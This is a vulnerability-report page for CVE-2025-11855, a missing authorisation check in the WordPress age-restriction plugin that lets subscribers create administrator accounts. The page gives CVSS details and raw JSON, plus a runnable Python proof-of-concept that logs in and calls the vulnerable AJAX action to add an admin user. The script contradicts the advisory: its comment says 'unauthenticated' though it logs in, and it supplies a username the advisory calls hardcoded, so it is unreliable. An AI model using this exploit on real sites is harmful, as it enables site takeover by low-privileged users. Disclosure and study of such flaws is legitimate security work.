Security Vulnerability Report
中文
CVE-2025-11855 CVSS 7.5 HIGH

CVE-2025-11855

Published: 2025-11-11 06:15:35
Last Modified: 2026-04-15 00:35:42

Description

The age-restriction WordPress plugin through 3.0.2 does not have authorisation in the age_restrictionRemoteSupportRequest function, allowing any authenticated users, such as subscriber to create an admin user with a hardcoded username and arbitrary password.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

age-restriction plugin < 3.0.2
age-restriction plugin <= 3.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-11855 PoC # WordPress age-restriction plugin <= 3.0.2 - Privilege Escalation via Unauthenticated Admin Creation target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target.com" username = sys.argv[2] if len(sys.argv) > 2 else "wpscan" password = sys.argv[3] if len(sys.argv) > 3 else "password123" # WordPress login to get authentication cookie login_url = f"{target_url}/wp-login.php" login_data = { "log": "attacker_account", # Any valid low-privilege user "pwd": "user_password", "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } session = requests.Session() login_response = session.post(login_url, data=login_data) # Check if login successful if "wordpress_logged_in" in str(session.cookies) or login_response.status_code == 200: print("[+] Logged in successfully") # Exploit the vulnerable endpoint exploit_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { "action": "age_restrictionRemoteSupportRequest", "username": username, "password": password } exploit_response = session.post(exploit_url, data=exploit_data) if exploit_response.status_code == 200: print(f"[+] Exploit sent - Admin user '{username}' should be created") print(f"[+] Login with: {username}:{password}") else: print("[-] Exploit failed") else: print("[-] Login failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11855", "sourceIdentifier": "[email protected]", "published": "2025-11-11T06:15:35.000", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The age-restriction WordPress plugin through 3.0.2 does not have authorisation in the age_restrictionRemoteSupportRequest function, allowing any authenticated users, such as subscriber to create an admin user with a hardcoded username and arbitrary password."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "references": [{"url": "https://wpscan.com/vulnerability/1a16440e-817f-4ec2-9c70-261f6b63fb8a/", "source": "[email protected]"}]}}